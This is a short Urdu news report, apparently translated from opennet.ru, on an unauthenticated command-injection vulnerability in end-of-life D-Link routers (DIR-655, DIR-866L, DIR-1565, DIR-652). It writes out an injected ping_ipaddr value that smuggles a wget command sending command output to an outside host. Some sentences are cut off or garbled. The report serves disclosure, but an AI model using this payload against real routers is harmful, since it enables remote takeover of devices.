D-Link وائرلیس راؤٹرز میں
دلچسپ بات یہ ہے کہ فرم ویئر ڈویلپرز کے مطابق، "ping_test" کال کو تصدیق کے بعد ہی کیا جانا چاہیے، لیکن حقیقت میں اسے کسی بھی صورت میں کال کیا جاتا ہے، چاہے ویب انٹرفیس میں لاگ ان کیوں نہ ہو۔ خاص طور پر، جب apply_sec.cgi اسکرپٹ تک رسائی حاصل کرتے ہیں اور "action=ping_test" پیرامیٹر کو پاس کرتے ہیں، تو اسکرپٹ توثیق کے صفحہ پر ری ڈائریکٹ ہوتا ہے، لیکن ساتھ ہی ping_test سے وابستہ کارروائی انجام دیتا ہے۔ کوڈ کو عمل میں لانے کے لیے، خود ping_test میں ایک اور کمزوری کا استعمال کیا گیا تھا، جو جانچ کے لیے بھیجے گئے آئی پی ایڈریس کی درستگی کو درست طریقے سے جانچے بغیر پنگ یوٹیلیٹی کو کال کرتا ہے۔ مثال کے طور پر، wget یوٹیلیٹی کو کال کرنے اور "echo 1234" کمانڈ کے نتائج کو کسی بیرونی میزبان کو منتقل کرنے کے لیے، صرف "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://" پیرامیٹر کی وضاحت کریں۔ test.test/?$( echo 1234)"۔
مندرجہ ذیل ماڈلز میں خطرے کی موجودگی کی باضابطہ طور پر تصدیق کی گئی ہے۔
- DIR-655 فرم ویئر 3.02b05 یا اس سے زیادہ کے ساتھ؛
- DIR-866L فرم ویئر 1.03b04 یا اس سے زیادہ کے ساتھ؛
- DIR-1565 فرم ویئر 1.01 یا اس سے زیادہ کے ساتھ؛
- DIR-652 (مسئلہ فرم ویئر ورژن کے بارے میں کوئی معلومات فراہم نہیں کی گئی ہیں)
ان ماڈلز کے لیے سپورٹ کی مدت پہلے ہی ختم ہو چکی ہے، لہذا D-Link
بعد میں پتہ چلا کہ کمزوری بھی تھی۔
ماخذ: opennet.ru